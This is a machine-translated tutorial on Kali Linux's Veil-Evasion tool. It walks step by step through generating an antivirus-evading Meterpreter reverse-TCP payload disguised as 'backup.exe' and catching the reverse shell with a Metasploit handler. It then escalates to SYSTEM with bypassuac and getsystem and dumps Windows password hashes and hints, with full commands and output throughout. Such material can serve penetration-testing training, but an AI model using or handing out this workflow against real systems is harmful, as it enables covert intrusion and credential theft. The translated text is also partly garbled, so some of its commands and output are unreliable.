Kali-linux Kill payload Generation tool veil

Veil is a compatible payload tool built using the Metasploit framework and bypasses common antivirus software in most network environments. This section describes the installation and use of the Veil tool.

In Kali Linux, the Veil tool is not installed by default. Here, first install the Veil tool and execute the command shown below:

[email protected]:~# apt-get install veil

After executing the above command, if the installation process does not indicate an error, the Veil tool installation is successful. This process is a bit long because it relies on more software to install the tool.

Start the Veil tool. The execution commands are as follows:

[email protected]:~# veil-evasion

After executing the above command, a large amount of information will be output. As shown below:

=============================================== Veil First Run detected ... Initializing Script setup...===============================================[*] executing./setup/setup.sh=========== ==================================== veil-evasion Setup Script | [Updated]: 01.15.2015=============================================== [Web]: https://www.veil-framework.com | [Twitter]: @VeilFramework ===============================================[*] Initializing Apt Dependencies Installation[*] Adding i386 Architecture to x86_64 system[*] Updating Apt package lists hit http://mirrors.ustc.edu.cn Kali RELEASE.GPG hit http://mirrors.ustc.edu.cn kali/updates release.gpg hit http://mirrors.ustc.edu.cn kali Release hit/http/ mirrors.ustc.edu.cn kali/updates release hit http://mirrors.ustc.edu.cn kali/main sources hit http://mirrors.ustc.edu.cn Kali/non-free sources hit http://mirrors.ustc.edu.cn kali/contrib sources hit http://mirrors.ustc.edu.cn kali/main AMD64 Packages hit http://mirrors.ustc.edu.cn Kali/non-free amd64 PaCkages hit http://mirrors.ustc.edu.cn kali/contrib amd64 Packages gets: 1 http://mirrors.ustc.edu.cn kali/main i386 Packages [8,474 KB] hit http://http.kali.org kali release.gpg hit http://security.kali.org kali/updates release.gpg hit/http/ Http.kali.org Kali Release ... Ignore http://http.kali.org kali/non-free translation-en download 17.8 MB, time consuming 20 seconds (859 kb/s) reading package list ... Complete [*] installing Wine i386 binaries is reading the package list ... Completing the dependency tree that is analyzing the package is reading state information ... Completion will install the following additional packages: gcc-4.7-base:i386 libasound2:i386 libc-bin libc-dev-bin libc6 libc6:i386 libc6-dev libc6-i686:i386 libdbus-1-3:i386 libdrm-intel1:i386 libdrm-nouveau1a:i386 libdrm-radeon1:i386 libdrm2:i386 libexpat1:i386 libffi5: i386 libfontconfig1:i386 libfreetype6:i386 libgcc1:i386[*] cleaning up Setup files[*] Updating veil-framework Configuration veil-framework configuration: [*] Operating_system = Kali [*] terminal_clear = CLEAR [*] Temp_dir =/tmp/[* ] Msfvenom_options = [*] Metasploit_path =/usr/share/metasploit-framework/[*] Pyinstaller_path =/usr/share/pyinstaller/[*] Veil_evasion_path =/usr/share/veil-evasion/[*] Payload_source_path =/root/veil-output/source/[*] PATH '/ root/veil-output/source/' Created [*] Payload_compiled_path =/root/veil-output/compiled/[*] PATH '/root/veil-output/ compiled/' Created [*] Path '/root/veil-output/handlers/' Created [*] Generate_handler_script = True [*] Handler_path =/R oot/veil-output/handlers/[*] hash_list =/root/veil-output/hashes.txt[*] Veil_catapult_path =/usr/share/ veil-catapult/[*] Path '/root/veil-output/catapult/' Created [*] Catapult_resource_path =/root/veil-output/catapult/ [*] Path '/etc/veil/' Created Configuration File written to '/etc/veil/settings.py '

The above information is only displayed when you run veil for the first time. During this process, initialize some scripts, package lists, update configurations, and install the required packages. In this process, the Python and its two modules pywin32-218 and pycrypto-2.6 are installed in the form of a graphical interface. Install the following in turn. The first popup dialog box, shown in 6.32.

Figure 6.32 Python initial interface

This interface is the initial interface for installing Python. Using the default settings here, click the Next button and the interface shown in 6.33 will be displayed.

Figure 6.33 Choosing a Python installation location

Clicking on the Next button in the interface will show the interface shown in 6.34. The interface prompts that C:\Python27 already exists, confirming that you want to overwrite the existing file. Click the Yes button here to display the interface shown in 6.35.

Figure 6.34 confirming the location of the Python installation

Figure 6.35 Customizing Python

Customize some of the features of Python installation in this interface. Using the default settings here, click the Next button and the interface shown in 6.36 will be displayed.

Figure 6.36 Installation Complete

The interface prompts that Python is already installed. When you click the Finish button, the interface shown in 6.37 is displayed.

Figure 6.37 Installing the pywin32-218 module interface

The interface is required to install the pywin32-218 module. Click the "Next" button here and the interface shown in 6.38 will be displayed.

Figure 6.38 Setup Wizard

Using the default settings here, click the Next button and the interface shown in 6.39 will be displayed.

Figure 6.39 Preparing the installation

The interface is used to actually start the installation. If you confirm that the configuration is correct, click the Next button and the interface shown in 6.40 will be displayed.

Figure 6.40 Installation Complete

From this interface you can see that the pywin32-218 module has been installed. When you click the End button, the interface shown in 6.41 is displayed.

Figure 6.41 Installing the pycrypto-2.6 module initial interface

This interface prompts you to install the pycrypto-2.6 module. Here, click the "Next" button to start the installation, as shown in 6.42.

Figure 6.42 Setup Wizard

Using the default settings here, click the Next button and the interface shown in 6.43 will be displayed.

Figure 6.43 Preparing the installation

This interface prompts you to install the Pycrypto module. Click the "Next" button here and the interface shown in 6.44 will be displayed.

Figure 6.44 Installation Complete

From this interface, you can see that the above packages have been installed. When you click the End button, the following information appears:

=============================================== Veil-Evasion | [Version]: 2.4.3=============================================== [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework===============================================Main Menu  24 payloads loadedAvailable commands:  use      use a specific payload  info     information on a specific payload  list     list available payloads  update   update Veil to the latest version  clean    clean out payload folders  checkvt  check payload hashes vs. VirusTotal  exit     exit Veil[>] Please enter a command:

From the above information can be seen under veil, there are 24 attack load can be loaded, and lists the available commands. Now you can do all kinds of things. For example, to view a loadable attack module, execute the command as follows:

[;] Please enter a command:list=============================================== veil-evasion | [Version]: 2.4.3=============================================== [Web]: https://www.veil-framework.com/| [Twitter]: @VeilFramework ===============================================[*] Available payloads:1) c/meterpreter/ Rev_tcp 2) C/meterpreter/rev_tcp_service 3) c/shellcode_inject/virtual 4) c/shellcode_inject/void 5) Cs/meterp   RETER/REV_TCP 6) cs/shellcode_inject/base64_substitution 7) Cs/shellcode_inject/virtual 8) Native/Hyperion 9) native/backdoor_factory) Native/pe_scrambler powershell/shellcode_inject/download_virtual) Powershell/shel lcode_inject/psexec_virtual) powershell/shellcode_inject/virtual python/meterpreter/rev_http) Python/meter preter/rev_http_contained) Python/meterpreter/rev_https python/meterpreter/rev_https_contained) Python/met ERPRETER/REV_TCP) Python/shellcode_inject/aes_encrypt python/shellcode_inject/arc_encrypt python/shellcode_inject/base64_substitution) Python/shellcode_inject/des_ Encrypt, Python/shellcode_inject/flat) python/shellcode_inject/letter_substitution

From the output information, you can see that there are 24 available attack loads. At this point, any attack load can be exploited to penetrate the attack.

"Example 6-5" demonstrates the use of loads in the Veil tool (in this case, cs/meterpreter/rev_tcp for example) for penetration attacks (where Windows 7 is the attack target drone). The following steps are shown below.

(1) Start the Veil tool. The execution commands are as follows:

[email protected]:~# veil-evasion

After executing the above command, the following information is displayed:

=============================================== Veil-Evasion | [Version]: 2.4.3=============================================== [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework===============================================Main Menu  24 payloads loadedAvailable commands:  use      use a specific payload  info     information on a specific payload  list     list available payloads  update   update Veil to the latest version  clean    clean out payload folders  checkvt  check payload hashes vs. VirusTotal  exit     exit Veil[>] Please enter a command:

In the output information to see [;] Please enter a command: prompt, indicating that the veil login succeeded.

(2) Select Cs/meterpreter/rev_tcp attack load. In the attack payload list, the CS/METERPRETER/REV_TCP load is numbered 5. The execution commands are as follows:

[>] Please enter a command: use 5=============================================== Veil-Evasion | [Version]: 2.4.3=============================================== [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework===============================================Payload: cs/meterpreter/rev_tcp loadedRequired Options:Name            Current Value   Description ----           -------------   -------------------------- LHOST                          IP of the metasploit handler LPORT          4444            Port of the metasploit handler compile_to_exe Y               Compile to an executableAvailable commands:  set       set a specific option value  info      show information about the payload  generate  generate payload  back      go to the main menu  exit      exit Veil [>] Please enter a command:

The output information shows the configurable option parameters for the REV_TCP attack payload. The default local port (lport) specified here is the 4444,lhost option that is not configured yet.

(3) Configure the Lhost option parameter and view the details of the attack payload. The execution commands are as follows:

[>] Please enter a command: set LHOST 192.168.6.103[>] Please enter a command: info=============================================== Veil-Evasion | [Version]: 2.4.3=============================================== [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework===============================================Payload information:  Name:         cs/meterpreter/rev_tcp  Language:     cs  Rating:       Excellent  Description:  pure windows/meterpreter/reverse_tcp stager, no shellcodeRequired Options:Name             Current Value  Description ----            ------------- -------------------------- LHOST           192.168.6.100  IP of the metasploit handler LPORT           4444           Port of the metasploit handler compile_to_exe  Y              Compile to an executable

From the output information, you can see details of the REV_TCP attack payload, such as attack payload name, language, level, and configuration options parameters.

(4) At this point, use the Generate command to generate the load file. The execution commands are as follows:

[>] Please enter a command: generate=============================================== Veil-Evasion | [Version]: 2.4.3=============================================== [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework===============================================[*] Press [enter] for ‘payload‘ [>] Please enter the base name for output files: backup  #指定输出文件名

Specify a file name of backup in the above command. Then press ENTER to display the information shown below:

 [*] Executable written to: /root/veil-output/compiled/backup.exeLanguage:            cs Payload:            cs/meterpreter/rev_tcp Required Options:   LHOST=192.168.6.103 LPORT=4444 compile_to_exe=Y Payload File:       /root/veil-output/source/backup.cs Handler File:       /root/veil-output/handlers/backup_handler.rc[*] Your payload files have been generated, don‘t get caught! [!] And don‘t submit samples to any online scanner! ;)[>] press any key to return to the main menu:

From the output information you can see that an executable file Backup.exe is generated, and the file is saved in/root/veil-output/compiled/. When the executable file Backup.exe is sent to the target host, the attack payload can be exploited.

Next you need to create a remote processor using Metasploit, waiting for the target host to connect to the Kali Linux (attack host) operating system. Once the connection succeeds, it gets to a remote shell command.

"Instance 6-6" creates a remote processor. The following steps are shown below.

(1) Start the MSF terminal.

(2) Use the handler module. The execution commands are as follows:

msf > use exploit/multi/handler

(3) Load the REVERSE_TCP attack load and set its option parameters. The execution commands are as follows:

msf exploit(handler) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf exploit(handler) > set LHOST 192.168.6.103LHOST => 192.168.6.103

(4) Initiate penetration attack. The execution commands are as follows:

msf exploit(handler) > exploit[*] Started reverse handler on 192.168.6.103:4444[*] Starting the payload handler…

From the output information you can see that the attack payload has started and is waiting to connect to the target host.

The previously generated executable file, Backup.exe, is sent to the target host (Windows 7) and runs the executable file. Then return to the Kali Linux operating system, and you will see the information shown below:

[*] Sending stage (769536 bytes) to 192.168.6.110[*] Meterpreter session 1 opened (192.168.6.103:4444 -> 192.168.6.110:2478) at 2014-07-17 10:44:47 +0800meterpreter >

From the above information, you can see that a Meterpreter session has been successfully opened. This means that the target host has been successfully penetrated, and some shell commands can now be made. For the shell environment of the target host, execute the command as follows:

meterpreter > shellProcess 1544 created.Channel 1 created.Microsoft Windows [版本 6.1.7601]              (c) 2009 Microsoft CorporationC:\Users\lyw\Desktop>

The output information represents the command line that entered Windows 7 on the target system, and the user who is currently logged on to the target system is lyw.

If the above users do not have too high permissions, you can use the Bypassuac module in Metasploit to bypass UAC (user access control) and thereby elevate the user's permissions. The following describes the use of the Bypassuac module to elevate the permissions of Lyw users above.

(1) The Meterpreter session will be called to run in the background. The execution commands are as follows:

meterpreter > background[*] Backgrounding session 1…

From the output information, you can see that the session number currently running in the background is 1. This session number needs to be remembered and will be used later.

(2) View the session details. The execution commands are as follows:

From the output information, you can see the running schema, computer name, and IP address of the connection to the target system in this session.

(3) Use the Bypassuac module and view configurable option parameters. The execution commands are as follows:

From the output information, you can see that the module option has a configurable option parameter session. The value of this option is the session number that is currently running in the background.

(4) Set the session option parameter. As shown below:

msf exploit(bypassuac) > set session 1session => 1

(5) Initiate penetration attack. The execution commands are as follows:

msf exploit(bypassuac) > exploit[*] Started reverse handler on 192.168.6.103:4444[*] UAC is Enabled, checking level…[+] UAC is set to Default[+] BypassUAC can bypass this setting, continuing…[+] Part of Administrators group! Continuing…[*] Uploaded the agent to the filesystem….[*] Uploading the bypass UAC executable to the filesystem…[*] Meterpreter stager executable 73802 bytes long being uploaded..[*] Sending stage (769536 bytes) to 192.168.6.106[*] Meterpreter session 2 opened (192.168.6.103:4444 -> 192.168.6.106:49206) at 2014-07-18 10:15:38 +0800meterpreter >

From the output information, you can see that the currently logged on user is actually a member of the administrative group and that a new session has been created by bypassing UAC. At this point, you can elevate the user's permissions.

(6) View Lyw user's information. The execution commands are as follows:

meterpreter > getuidServer username: WIN-RKPKQFBLG6C\lyw

From the output information, you can see that the user is just an ordinary user in the WIN-RKPKQFBLG6C computer.

(7) Elevate the rights of LYW users and view their user information. The execution commands are as follows:

meterpreter > getsystem…got system (via technique 1).meterpreter > getuidServer username: NT AUTHORITY\SYSTEM

The current LYW user can be seen from the output information, with system-level permissions. At this point, you can do anything. such as capturing the user's password hash value in the target system. The execution commands are as follows:

meterpreter > run post/windows/gather/hashdump[*] Obtaining the boot key…[*] Calculating the hboot key using SYSKEY 88f6c818af614f7033cb885 74907b61c…[*] Obtaining the user list and keys…[*] Decrypting user keys…[*] Dumping password hints…Test:"www.123"abc:“123456”alice:“passwd”[*] Dumping password hashes…Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::bob:1001:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::

From the output information, you can see that there are three users in the target system, and you can see their UID and password hashes. Also, a password of three keyboard inputs is captured. such as the captured test user, whose password is www.123.

Kali-linux Kill payload Generation tool veil